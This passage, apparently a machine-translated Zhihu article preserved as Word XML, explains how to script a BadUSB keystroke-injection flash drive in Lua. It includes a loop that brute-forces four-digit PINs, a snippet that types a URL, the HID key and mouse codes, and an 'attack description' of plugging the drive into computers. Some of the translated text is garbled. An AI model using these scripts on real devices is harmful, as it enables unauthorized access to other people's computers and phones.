      <w:hyperlink r:id="rId33">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">вводит http:// nnnxxx.cn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enter, затем перемещает мышь на 100 пикселей вправо и на 100 пикселей вниз.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Другие примеры включают:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Вывод четырёхзначного пароля 0000-9999:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">for i = 0, 9 do</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    for j =0,9 do</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       for k=0,9 do</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          for m=0,9 do</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          raw_key(0,30+i)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          raw_key(0,30+j)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          raw_key(0,30+k)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          raw_key(0,30+m)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">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Проводите пальцем вверх по экрану телефона каждую секунду</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">while 1 do</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">null_mouse()       </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(15)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(1,0,0,0) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(10)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(1,0,158,0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(10)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(1,0,158,0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(10)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(1,0,158,0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(10)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(1,0,158,0) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(10)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">null_mouse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(2000) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(0,0,98,0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(5)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(0,0,98,0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(5)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(0,0,98,0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(5)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(0,0,98,0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(5)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(2000)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Другие функции могут разрабатываться пользователями</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После написания lua-скрипта нужно использовать luac4 для предварительной компиляции скрипта, а затем поместить luac.out, сгенерированный прекомпиляцией, в корневую папку USB-флешки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Скачать адрес luac4:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">LuaBinaries - luac4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Команды компиляции:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">luac4.exe  -s  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本名</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本名替换为你的脚本名称，命令执行完会在当前目录生成luac.out，把这个文件拷到U盘根目录即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Описание функции экспорта:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">keys(string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">str):连续输入一串字符，参数为字符串，支持转义字符，比如\n</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">raw_key(int function_key, int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">str_key):原始按键，只接受十进制功能键码和一个普通键码。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(int a, int b, int c, int d): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">鼠标操作，四个参数为HID的四字节码，十进制。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">null_mouse(): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">释放鼠标所有按键。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dura):延迟函数，参数为毫秒数。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">random(int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">max):生成一个不大于max的随机整数</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">format():格式化U盘，盘是特殊格式，只能使用这个命令格式化，不能在windows下手动格式化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Код клавиатуры:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/* HIDKey */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">//HIDKey[0]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0字节bit位：多个功能键同时按则将键码相加即可</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">//    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0：左Ctrl</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">//    1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">左Shift</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">//    2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">左Alt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">//    3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">左GUI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">//    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4：右Ctrl</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">//    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5：右Shift</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">//    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">6：右Alt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">//    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">7：右GUI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1字节保留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2-7字节为按键</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Соответствующий код кнопки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Код мыши:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">*鼠标发送给PC的数据每次4个字节</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*BYTE1 BYTE2 BYTE3 BYTE4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">*定义分别是：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*BYTE1 –</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|–bit7: 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">坐标的变化量超出－256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">255的范围,0表示没有溢出</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|–bit6: 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示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坐标的变化量超出－256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">255的范围，0表示没有溢出</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|–bit5: Y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">坐标变化的符号位，1表示负数，即鼠标向下移动</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|–bit4: X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">坐标变化的符号位，1表示负数，即鼠标向左移动</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|–bit3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">恒为1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|–bit2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1表示中键按下</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|–bit1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1表示右键按下</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|–bit0: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1表示左键按下</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BYTE2 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">X坐标变化量，与byte的bit4组成9位符号数,负数表示向左移，正数表右移。用补码表示变化量</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BYTE3 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Y坐标变化量，与byte的bit5组成9位符号数，负数表示向下移，正数表上移。用补码表示变化量</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BYTE4 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">滚轮变化。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="76" w:name="X1c79ba196b97091aa6aba7818eecc94375a867a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Описание нападения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. После завершения настройки сохраните всплывающую USB-флешку, не нажимайте кнопку, чтобы вставить её в компьютер для проведения атаки. Простая версия медленнее и начинает атаковать примерно через 7-10 секунд после ввода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Моделируется принцип атаки BadUSB</w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Клавиатура HID</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">Теоретически она поддерживает все системы, поддерживающие HID, такие как Linux, Windows, Android и др., но разные команды операционной системы отличаются, например, клавиша WIN+R открыта и запускается в Windows, а другие системы не обязательно являются такими и могут быть настроены как разные кнопки для разных систем.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Отредактировано 2025-04-01 11:42 ・Shandong</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Безопасность информационных сетей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">](</w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://zhuanlan.zhihu.com//www.zhihu.com/topic/19923985</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Информационная безопасность</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">](</w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://zhuanlan.zhihu.com//www.zhihu.com/topic/19561983</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сетевая информационная безопасность</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">](</w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://zhuanlan.zhihu.com//www.zhihu.com/topic/20551634</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Согласен, 2912 рецензий</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Предоставить общий доступ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">типаКоллекцияЗапрос на переиздание</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Не вошёл в систему пользователей</w:t>
